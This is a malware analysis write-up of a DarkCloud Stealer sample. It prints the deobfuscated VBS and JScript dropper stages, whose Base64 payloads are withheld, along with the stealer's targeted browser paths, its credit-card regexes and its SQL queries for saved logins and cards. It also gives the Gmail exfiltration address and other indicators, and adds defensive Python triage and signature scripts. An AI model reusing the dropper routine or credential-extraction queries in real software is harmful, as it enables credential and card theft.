
DarkCloud Malware Analysis
Background
By early 2025, the cyber landscape had shifted dramatically. Digital defenses adapted quickly—but DarkCloud Stealer, a sophisticated information-stealer first seen in 2022, had quietly evolved. A new AutoIt-decoded campaign emerged in January and February 2025, targeting high-value institutions including Polish government networks and finance companies. These variants were hidden inside phishing emails and weaponized RAR archives hosted on file-sharing platforms. When victims downloaded them, an AutoIt executable delivered XOR-encrypted payloads and shellcode, eventually unlocking the DarkCloud payload in memory.
Analysis Motivation
I noticed a DarkCloud sample listed in Malware Bazaar and decided to investigate, hoping to find new malware samples.

Infection Chain
The malware flow was honestly shorter compared to other malware I've worked with.

The obfuscations were somewhat annoying but easy to deobfuscate. I would even say that the first three files used nearly the same obfuscation technique with just a few variations.
Deobfuscated Components
Stage 1: Bukti_Transfer.vbs
```vbscript
tJJD = <base64 data>

private function qdUwPdivbxOxQqtzizZckfyGUlMwxwxjAOnruYnurq ( asxgYBeRPktTnNmMAYHDbkZtLblVPBcIKZuFtPjkkSSoYGaFXcUNDWCqTEVwQJBNHlJNThSlpWTJR )
    CreateObject( Microsoft.xmldom ).createElement( "hadXkIlrRLm" ).DataType = bin.base64
    CreateObject( Microsoft.xmldom ).createElement( "hadXkIlrRLm" ).Text = asxgYBeRPktTnNmMAYHDbkZtLblVPBcIKZuFtPjkkSSoYGaFXcUNDWCqTEVwQJBNHlJNThSlpWTJR
    qdUwPdivbxOxQqtzizZckfyGUlMwxwxjAOnruYnurq = CreateObject( Microsoft.xmldom ).createElement( "hadXkIlrRLm" ).NodeTypedValue
end function

Sub UabNeUPVDYZliECkFVEBrWraz( KLekuYrThvhlvnaSBAdMgwIeFscHHqncJwyLmNTlnvuijzCrYNvBZpZNDAfCwkLrHEczoPfogrZkCZvGpl , jeEhreMLGLMdeMGYfWgkxtABpCvmGCeTgnihSEifsCeAkezGlFIyOaNpeCspjaFDhswrdYGboBruPzQKCoBAufFGZtCQLsvSxaT)
    CreateObject( AdoDb.stream ).Type = 1
    CreateObject( AdoDb.stream ).Open
    CreateObject( AdoDb.stream ).Write jeEhreMLGLMdeMGYfWgkxtABpCvmGCeTgnihSEifsCeAkezGlFIyOaNpeCspjaFDhswrdYGboBruPzQKCoBAufFGZtCQLsvSxaT
    CreateObject( AdoDb.stream ).SaveToFile KLekuYrThvhlvnaSBAdMgwIeFscHHqncJwyLmNTlnvuijzCrYNvBZpZNDAfCwkLrHEczoPfogrZkCZvGpl, 2
End Sub

UabNeUPVDYZliECkFVEBrWraz CreateObject( SCRipting.filesystemobject ).getspecialfolder( 2 )\DIFqiByo.js, qdUwPdivbxOxQqtzizZckfyGUlMwxwxjAOnruYnurq(tJJD)
CreateObject("WScript.Shell").Run CreateObject( SCRipting.filesystemobject ).getspecialfolder( 2 )\DIFqiByo.js
```

The flow is: decode the Base64 blob through an MSXML element with DataType `bin.base64`, write the resulting bytes with an ADODB.Stream into the user's temp folder (`getspecialfolder( 2 )`), and run the dropped file with WScript.Shell.
Stage 2: DIFqiByo.js
```javascript
XCaAtSSXdBxcDghydxGTzrHLzvIOjsbNfwLultI = "<base64_string>";
UHYgIKAlppsqDgDwqEAhaRmVfBdoFM = new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\\Fexcel.xls";

function zcFEtAhLdQTEBlkhVCFKTZfScCEKhu(XwMAPAhkvmlUNbZQhAbymGZJAivpspBOpiajuMcITJZIvHICMyooIgOQWDzhEssF) {
    var kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK = new ActiveXObject("Microsoft.XMLDOM").createElement("YkNWdVKSrzJKfxvQTcyPsOPeKXzGibcGkeEdxvyxSPLiwLuBzPckzYeJUiMGWEkP");
    kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK.dataType = "bin.base64";
    kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK.text = XwMAPAhkvmlUNbZQhAbymGZJAivpspBOpiajuMcITJZIvHICMyooIgOQWDzhEssF;
    return kWeeBqWVYTecgQNsZtctBMFJUJNrMvDbRTYYdeBWcTQpBmkFpGHLPyEXRUJrdeIcQDK.nodeTypedValue;
}

function bNXRDryrkPSQqZsOnPvTzrgBOxheSFwpNmOLTAiCd(qXBQJWZQUiIoHxjzsqbmmhMdKDUDBGhMgdyUonWgXZkRYlKpmfJm, XeVvaZUARvxJpMkLnbYRRTEsnPiVfhxRCdUbJsGdkpxZGXttkzgaVqcEacILqzVjxgGMsIBuUvgbWemPVpkfA) {
    var omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu = new ActiveXObject("ADODB.Stream");
    omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Open();
    omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Type = 1;
    omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Write(XeVvaZUARvxJpMkLnbYRRTEsnPiVfhxRCdUbJsGdkpxZGXttkzgaVqcEacILqzVjxgGMsIBuUvgbWemPVpkfA);
    omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Position = 0;
    omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.SaveToFile(qXBQJWZQUiIoHxjzsqbmmhMdKDUDBGhMgdyUonWgXZkRYlKpmfJm, 2);
    omQoIUtzCswJfnXxJxDFRRfiPLzvKLBuJUdAFDRPYOMqTuISMEqqaHbWGhYwUyorqBzKJXrGfngCFpOUDgjFVLTBtHu.Close();
}

bNXRDryrkPSQqZsOnPvTzrgBOxheSFwpNmOLTAiCd(new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\\adobe.js", zcFEtAhLdQTEBlkhVCFKTZfScCEKhu(XCaAtSSXdBxcDghydxGTzrHLzvIOjsbNfwLultI));
bNXRDryrkPSQqZsOnPvTzrgBOxheSFwpNmOLTAiCd(UHYgIKAlppsqDgDwqEAhaRmVfBdoFM, zcFEtAhLdQTEBlkhVCFKTZfScCEKhu(hwEGxbBGnBNdYyRQfv));
new ActiveXObject("WScript.Shell").Run(new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\\adobe.js");
new ActiveXObject("WScript.Shell").Run(UHYgIKAlppsqDgDwqEAhaRmVfBdoFM);
```

Same decode-write-run pattern as the VBS stage, now producing two files in the temp folder: `adobe.js` (the next dropper stage) and `Fexcel.xls`, both launched via WScript.Shell. The second Base64 literal, `hwEGxbBGnBNdYyRQfv`, is not reproduced in the listing above.
Stage 3: adobe.js
```javascript
WjfOMggRpJFcoITKXbCPawOtniqPc = "<base64_string>";
FTRROHYpgXUatWipcLjFwD = new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\\JReSz.exe";

function OMqNgoRrQmsuhTxuvdFrvfHuKGQdzBpDyYbuX(TBJfBLfbmhXlhPMXgVClficsWQbhEjZbcsSumKHnCpSkrqXwbpwriWYlZQIlkyXDHvJpwRkV) {
    OOjqQrBfteGPmisFThUVBVDEROdvhiAJFacUnhUhPdsGrIQYDDVOxPTsLfYBOFyKewKMGYSlNmFYdxMJy.dataType = "bin.base64";
    OOjqQrBfteGPmisFThUVBVDEROdvhiAJFacUnhUhPdsGrIQYDDVOxPTsLfYBOFyKewKMGYSlNmFYdxMJy.text = TBJfBLfbmhXlhPMXgVClficsWQbhEjZbcsSumKHnCpSkrqXwbpwriWYlZQIlkyXDHvJpwRkV;
    return OOjqQrBfteGPmisFThUVBVDEROdvhiAJFacUnhUhPdsGrIQYDDVOxPTsLfYBOFyKewKMGYSlNmFYdxMJy.nodeTypedValue;
}

YnBjXqSbajJqZKnFLbqmzukQhfjfnCSHtrtEGgdmBrmzcGcMFNQSnfZdCkCsGnnYRCxiQiyfxEkIIkoaDWZalzUNRQCWdlfODOiaJtvWOlUivRURvcojONmRijQzgcCMYVEtCNRJbCLAflRAvkaBwvApcQsZdvqmjIKZMbPiKfILCmmwRQEwCAPcVORlVrffMYRXa = "ADODB.Stream";

function rtSfknqMMIEJPdLbCDSclKEBnUBxRfpHOTAFjGXKhbEnYoSLuTG(aXosOwpwIrDWqJoZgXjEdivCGfHNVNrobCstdWtbAkPcXWgYACeLWsZrbmmiobauzOvoQvwKeHDsTSfjzjNTjgSjcBRrkKnZKVcIbrHFGThPohYJHDjFOGKTwMLPdEZTTdiypWHHbHMPyDuvcIkhbhLDKJMPgsbBuNvKyaTkvbeGtvVsRQ, vakSaKwgseLrCHtcjbJLBqSjyqiuKjUBKOgoZZUTUqjKuJMgEpupYaSFHATkbCWIKKhnaFDKHprLHHppdCpUpedkwbgYFksSUaAkbYFyljiijGyALdGZMBSfhxrzZfEWxYrgHENFwriFvuApcfMbdTGSHUDdhGYGfLlKPSsHQBcUTNjmwBWtSctdRY) {
    AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Open();
    AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Type = 1;
    AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Write(vakSaKwgseLrCHtcjbJLBqSjyqiuKjUBKOgoZZUTUqjKuJMgEpupYaSFHATkbCWIKKhnaFDKHprLHHppdCpUpedkwbgYFksSUaAkbYFyljiijGyALdGZMBSfhxrzZfEWxYrgHENFwriFvuApcfMbdTGSHUDdhGYGfLlKPSsHQBcUTNjmwBWtSctdRY);
    AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Position = 0;
    AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.SaveToFile(aXosOwpwIrDWqJoZgXjEdivCGfHNVNrobCstdWtbAkPcXWgYACeLWsZrbmmiobauzOvoQvwKeHDsTSfjzjNTjgSjcBRrkKnZKVcIbrHFGThPohYJHDjFOGKTwMLPdEZTTdiypWHHbHMPyDuvcIkhbhLDKJMPgsbBuNvKyaTkvbeGtvVsRQ, 2);
    AXEEvxGTXPJFlzYrAkKSGnZubEInXaEOndQuGKKQVHazrDSJppVGAxoMyJdroSwxKvRHielpZtwzNZDYlyyhEyNqpDwxhTcCLcpvlKbLEfgGApzYFEFpUOtMhbSfhnIFRtolkHmbXncYRHqAEXrcNmiwicOKrvdQXbpGBOoxSeRhmU.Close();
}

rtSfknqMMIEJPdLbCDSclKEBnUBxRfpHOTAFjGXKhbEnYoSLuTG(FTRROHYpgXUatWipcLjFwD, OMqNgoRrQmsuhTxuvdFrvfHuKGQdzBpDyYbuX(WjfOMggRpJFcoITKXbCPawOtniqPc));
bEXBUtvehdQuFvkqQVWhBuEzKZZUlaeqRp = new ActiveXObject("Wscript.Shell");
bEXBUtvehdQuFvkqQVWhBuEzKZZUlaeqRp.Run(FTRROHYpgXUatWipcLjFwD);
```

Third time the same routine: this stage writes `JReSz.exe` to the temp folder and executes it. The listing above omits the `new ActiveXObject(...)` statements that create the XMLDOM element (`OOjqQrBf...`) and the ADODB.Stream (`AXEEvxGT...`) it uses.
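All three dropper stages share one shape: a Base64 literal, an MSXML element with `dataType = "bin.base64"` to decode it, an ADODB.Stream `SaveToFile` into `GetSpecialFolder(2)` (the user's temp folder), and a `WScript.Shell.Run`. That regularity makes the stages easy to triage without executing them. The script below is an added example (not code from the write-up): it reads a dropper of this shape as text, pulls out the Base64 literal, decodes it in Python, classifies the embedded stage by its magic bytes and lists the file names dropped into the temp folder. The sample VBS/JS snippets and the fake payload bytes it runs on are constructed for this example; the indicator names are my own labels.

```python
"""Static triage of a VBS/JS dropper of the DarkCloud shape (added example)."""
import base64
import binascii
import re

# A Base64 literal of at least 40 characters assigned to a variable (JS or VBS form).
B64_LITERAL = re.compile(r'=\s*"([A-Za-z0-9+/]{40,}={0,2})"')
# GetSpecialFolder(2) is %TEMP%; capture the file name concatenated after it
# ('+ "\\name"' in JScript, '& "\name"' or a bare '\name' in VBScript).
DROP_PATH = re.compile(
    r'getspecialfolder\s*\(\s*2\s*\)\s*[+&]?\s*"?\\+([A-Za-z0-9_.-]+)', re.I)
# Building blocks of the decode-write-run routine; all three stages use every one.
INDICATORS = {
    "msxml bin.base64 decode": re.compile(r"bin\.base64", re.I),
    "adodb.stream binary write": re.compile(r"adodb\.stream", re.I),
    "savetofile to disk": re.compile(r"savetofile", re.I),
    "drop into %TEMP% (GetSpecialFolder(2))": re.compile(r"getspecialfolder\s*\(\s*2\s*\)", re.I),
    "wscript.shell run": re.compile(r"wscript\.shell", re.I),
}


def decode_blob(literal: str):
    """Strict Base64 decode; returns None for anything that is not valid Base64."""
    try:
        return base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(data: bytes) -> str:
    """Identify the dropped stage by magic bytes (PE, OLE2 such as .xls, ZIP, or script)."""
    if data[:2] == b"MZ":
        return "PE executable (MZ)"
    if data[:8] == b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1":
        return "OLE2 compound document (e.g. .xls)"
    if data[:4] == b"PK\x03\x04":
        return "ZIP container (e.g. .docx/.xlsx)"
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return "unknown binary"
    if re.search(r"ActiveXObject|CreateObject", text):
        return "script (next dropper stage)"
    return "text"


def triage(script_text: str) -> dict:
    """Indicators present, decoded blobs with their type, and temp-folder drop names."""
    blobs = []
    for literal in B64_LITERAL.findall(script_text):
        data = decode_blob(literal)
        if data is not None:
            blobs.append({"b64_len": len(literal), "size": len(data), "type": classify(data)})
    drop_paths = list(dict.fromkeys(DROP_PATH.findall(script_text)))  # dedupe, keep order
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(script_text))
    return {"indicators": hits, "blobs": blobs, "drop_paths": drop_paths}


# Constructed inputs: a fake "next stage" that only carries a PE magic, embedded in
# a JScript and a VBScript snippet written in the same shape as the real stages.
FAKE_STAGE = b"MZ\x90\x00" + b"constructed placeholder, not a real PE image " * 2
FAKE_B64 = base64.b64encode(FAKE_STAGE).decode()
SAMPLE_JS = (
    'xyz = "' + FAKE_B64 + '";\n'
    'out = new ActiveXObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\\\\JReSz.exe";\n'
    'function dec(s) { var e = new ActiveXObject("Microsoft.XMLDOM").createElement("x");'
    ' e.dataType = "bin.base64"; e.text = s; return e.nodeTypedValue; }\n'
    'function drop(p, d) { var st = new ActiveXObject("ADODB.Stream"); st.Open(); st.Type = 1;'
    ' st.Write(d); st.Position = 0; st.SaveToFile(p, 2); st.Close(); }\n'
    'drop(out, dec(xyz)); new ActiveXObject("WScript.Shell").Run(out);\n'
)
SAMPLE_VBS = (
    'tJJD = "' + FAKE_B64 + '"\n'
    'Drop CreateObject("Scripting.FileSystemObject").getspecialfolder( 2 ) & "\\DIFqiByo.js", Decode(tJJD)\n'
)

if __name__ == "__main__":
    for name, sample in (("JS", SAMPLE_JS), ("VBS", SAMPLE_VBS)):
        print(name, triage(sample))
```

The output for a real stage tells an analyst, before any dynamic run, whether the blob is the next script, the `.xls` file or the final PE, and which temp-folder file names to look for on disk.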
Final Payload: Visual Basic Executable
Finally, adobe.js drops a 32-bit binary compiled with Visual Basic 5.0 that serves as a stealer, keylogger, and logger.
Data Theft Capabilities
The malware steals data from the following sources:
Browser-Related Data
| Browser Profiles |
|---|
| \Google\Chrome\User Data |
| \Opera Software\Opera Stable |
| \Yandex\YandexBrowser\User Data |
| \360Chrome\Chrome\User Data |
| \Comodo\Dragon\User Data |
| \MapleStudio\ChromePlus\User Data |
| \Chromium\User Data |
| \Torch\User Data |
| \Epic Privacy Browser\User Data |
| \BraveSoftware\Brave-Browser\User Data |
| \Iridium\User Data |
| \7Star\7Star\User Data |
| \Amigo\User Data |
| \CentBrowser\User Data |
| \Chedot\User Data |
| \CocCoc\Browser\User Data |
| \Elements Browser\User Data |
| \Kometa\User Data |
| \Orbitum\User Data |
| \Sputnik\Sputnik\User Data |
| \uCozMedia\Uran\User Data |
| \Vivaldi\User Data |
| \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer |
| \CatalinaGroup\Citrio\User Data |
| \Coowon\Coowon\User Data |
| \liebao\User Data |
| \QIP Surf\User Data |
| \Microsoft\Edge\User Data |
| \Mozilla\Firefox\Profiles |
| \Waterfox\Profiles |
| \K-Meleon\Profiles |
| \Thunderbird\Profiles |
| \Comodo\IceDragon\Profiles |
| \8pecxstudios\Cyberfox\Profiles |
| \NETGATE Technologies\BlackHawK\Profiles |
| \Moonchild Productions\Pale Moon\Profiles |
Credit Card Data Patterns
The malware searches for credit card information using regular expressions for various card types:
| Card Type | Regular Expression Pattern |
|---|---|
| Amex Card | ^389[0-9]{11}$ |
| Carte Blanche Card | ^(6541|6556)[0-9]{12}$ |
| Diners Club Card | ^3(?:0[0-5]|[68][0-9])[0-9]{11}$ |
| Discover Card | 6(?:011|5[0-9]{2})[0-9]{12}$ |
| Insta Payment Card | ^63[7-9][0-9]{13}$ |
| JCB Card | ^(?:2131|1800|35\d{3})\d{11}$ |
| Korean Local Card | ^9[0-9]{15}$ |
| Laser Card | ^(6304|6706|6709|6771)[0-9]{12,15}$ |
| Maestro Card | ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$ |
| Mastercard | 5[1-5][0-9]{14}$ |
| Express Card | 3[47][0-9]{13}$ |
| Solo Card | ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$ |
| Union Pay Card | ^(62[0-9]{14,17})$ |
| Visa Card | 4[0-9]{12}(?:[0-9]{3})?$ |
| Visa Master Card | ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$ |
| Switch Card | ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$ |
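The same regular expressions are useful on the defensive side, as a signature for what the stealer is hunting for in clipboard or keylog data. Two things stand out when they are applied as a set: several patterns (Discover, Mastercard, Express, Visa, and the later branches of Solo and Switch) have no leading `^`, so they also fire on digit runs longer than a card number, and none of them verifies the Luhn check digit. The script below is an added example (not code from the write-up) that loads the table above verbatim, flags the loosely anchored patterns by splitting each one on its top-level alternations, and scans a constructed text buffer with a Luhn check added to cut false positives. The card numbers used are publicly documented payment-gateway test numbers, not real cards.

```python
"""Evaluate the stealer's credit-card regex table as a detection signature (added example)."""
import re

# Patterns copied verbatim from the table above.
CARD_PATTERNS = {
    "Amex Card": r"^389[0-9]{11}$",
    "Carte Blanche Card": r"^(6541|6556)[0-9]{12}$",
    "Diners Club Card": r"^3(?:0[0-5]|[68][0-9])[0-9]{11}$",
    "Discover Card": r"6(?:011|5[0-9]{2})[0-9]{12}$",
    "Insta Payment Card": r"^63[7-9][0-9]{13}$",
    "JCB Card": r"^(?:2131|1800|35\d{3})\d{11}$",
    "Korean Local Card": r"^9[0-9]{15}$",
    "Laser Card": r"^(6304|6706|6709|6771)[0-9]{12,15}$",
    "Maestro Card": r"^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$",
    "Mastercard": r"5[1-5][0-9]{14}$",
    "Express Card": r"3[47][0-9]{13}$",
    "Solo Card": r"^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$",
    "Union Pay Card": r"^(62[0-9]{14,17})$",
    "Visa Card": r"4[0-9]{12}(?:[0-9]{3})?$",
    "Visa Master Card": r"^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$",
    "Switch Card": r"^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$",
}
COMPILED = {name: re.compile(p) for name, p in CARD_PATTERNS.items()}


def top_level_branches(pattern: str) -> list:
    """Split a pattern on '|' that sits outside any parenthesised group."""
    branches, cur, depth, i = [], [], 0, 0
    while i < len(pattern):
        c = pattern[i]
        if c == "\\":                      # keep an escape with its following char
            cur.append(pattern[i:i + 2]); i += 2; continue
        if c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
        elif c == "|" and depth == 0:
            branches.append("".join(cur)); cur = []; i += 1; continue
        cur.append(c); i += 1
    branches.append("".join(cur))
    return branches


def loosely_anchored() -> list:
    """Names whose pattern has a top-level branch not bounded by both ^ and $."""
    return sorted(name for name, p in CARD_PATTERNS.items()
                  if any(not (b.startswith("^") and b.endswith("$")) for b in top_level_branches(p)))


def matching_types(text: str) -> list:
    """Card types whose pattern fires on the text, using search semantics like a .Test call."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(text))


def luhn_valid(digits: str) -> bool:
    """Standard Luhn check digit; the stealer's regexes skip this step."""
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = int(ch)
        if pos % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_text(text: str) -> list:
    """Digit runs of card length with the types that match and their Luhn status."""
    return [(run, matching_types(run), luhn_valid(run)) for run in re.findall(r"\d{12,19}", text)]


# Constructed buffer: one gateway test number plus digit runs that must not be flagged.
SAMPLE_TEXT = "Order 4111111111111111 shipped; call 5551234567 or 1-800-555-0199"

if __name__ == "__main__":
    print("loosely anchored:", loosely_anchored())
    print(scan_text(SAMPLE_TEXT))
```

Run over a keylog buffer, `scan_text` shows which of the page's patterns would have fired and whether the hit is even a plausible card, which is the difference between a noisy alert and a useful one.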
Database Queries
The malware runs SQL queries against the browsers' local login and credit-card databases to extract saved credentials and card data:

```sql
SELECT origin_url, username_value, password_value, length(password_value) FROM logins
SELECT origin_url, username_value, password_value FROM logins
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
```
Network Communication
- IP Resolution: Uses showip.net to determine the victim's IP address
- Data Exfiltration: Uses smtp.gmail.com service to send stolen data to "Williamsaustin2099@gmail.com"
Key Findings
- Multi-stage Infection: The malware uses a three-stage dropper chain (VBS → JS → JS → EXE)
- Base64 Obfuscation: All stages use Base64 encoding with variable name obfuscation
- Comprehensive Browser Support: Targets over 30 different browsers and browser variants
- Credit Card Detection: Uses sophisticated regex patterns to identify various credit card types
- Gmail Exfiltration: Uses legitimate Gmail SMTP servers for data exfiltration
- Legacy Technology: Final payload is compiled in Visual Basic v5.0
Indicators of Compromise (IOCs)
Email Addresses:
- Williamsaustin2099@gmail.com (data exfiltration)
Network Indicators:
- showip.net (IP resolution service)
- smtp.gmail.com (data exfiltration)
File Names:
- Bukti_Transfer.vbs
- DIFqiByo.js
- adobe.js
- Fexcel.xls
- JReSz.exe
Note: The VB binary was uploaded by JAMESWT_WT (2025-08-01) before my analysis, most likely a different case but the same malware family used for stealing and logging purposes.